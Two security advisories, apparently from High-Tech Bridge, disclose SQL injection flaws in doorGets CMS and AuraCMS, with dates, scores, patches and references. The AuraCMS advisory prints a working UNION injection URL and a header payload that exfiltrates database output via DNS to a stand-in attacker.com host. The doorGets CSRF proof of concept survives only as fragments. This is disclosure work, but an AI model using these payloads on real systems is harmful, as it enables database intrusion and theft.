Advisory ID: HTB23197 Product: doorGets CMS Vendor: doorGets Vulnerable Version(s): 5.2 and probably prior Tested Version: 5.2 Advisory Publication: January 15, 2014 [without technical details] Vendor Notification: January 15, 2014 Vendor Patch: January 15, 2014 Public Disclosure: February 5, 2014 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-1459 Risk Level: Medium CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in doorGets CMS, which can be exploited to perform SQL Injection attacks. 1) SQL Injection in doorGets CMS: CVE-2014-1459 The vulnerability exists due to insufficient validation of "_position_down_id" HTTP POST parameter passed to "/dg-admin/index.php" script. A remote attacker with access to administrative interface can execute arbitrary SQL commands in application's database. This vulnerability however can be exploited by a remote unauthenticated user via CSRF vector. The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will use a CSRF vector to send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker): http://[host]/dg-admin/?controller=rubriques"; method="post" name="main"> document.getElementById('btn').click(); --- Solution: Fixed by vendor on January 15, 2014 directly in the source code without version modification/new release. Update to the version 5.2 released after January 15, 2014. More Information: https://github.com/doorgets/doorGets/commit/6b81541fc1e5dd1c70614585c1a04d04ccdb3b19 --- References: [1] High-Tech Bridge Advisory HTB23197 - https://www.htbridge.com/advisory/HTB23197 - SQL Injection in doorGets CMS. [2] doorGets CMS - http://www.doorgets.com - doorGets CMS is a free content management system (CMS), that allows you to create easily your corporate or personal website. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Multiple SQL Injection Vulnerabilities in AuraCMS
Advisory ID: HTB23196 Product: AuraCMS Vendor: AuraCMS Vulnerable Version(s): 2.3 and probably prior Tested Version: 2.3 Advisory Publication: January 8, 2014 [without technical details] Vendor Notification: January 8, 2014 Vendor Patch: January 30, 2014 Public Disclosure: February 5, 2014 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-1401 Risk Level: Medium CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in AuraCMS, which can be exploited to alter SQL queries and execute arbitrary SQL commands in application's database. 1) Multiple SQL Injection Vulnerabilities in AuraCMS: CVE-2014-1401 1.1 The vulnerability exists due to insufficient validation of "search" HTTP GET parameter passed to "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. The exploitation example below displays version of MySQL server: http://[host]/index.php?mod=content&action=search&search=1%27%29%2f**%2funion%2f**%2fselect%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202 1.2 The vulnerability exists due to insufficient validation of "CLIENT_IP", "X_FORWARDED_FOR", "X_FORWARDED", "FORWARDED_FOR", "FORWARDED" HTTP headers in "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. The exploitation example below displays version of MySQL server: GET / HTTP/1.1 CLIENT_IP: '),('',(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114) -- 2 --- Solution: Fixed by vendor on January 30, 2014 directly in the source code without version modification/new release. Update to the version 2.3 released after January 30, 2014. More Information: https://github.com/auracms/AuraCMS/commit/4fe9d0d31a32df392f4d6ced8e5c25ed4af19ade --- References: [1] High-Tech Bridge Advisory HTB23196 - https://www.htbridge.com/advisory/HTB23196 - Multiple SQL Injection Vulnerabilities in AuraCMS. [2] AuraCMS - http://auracms.org - AuraCMS is an open source software that will let you manage content of your website. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.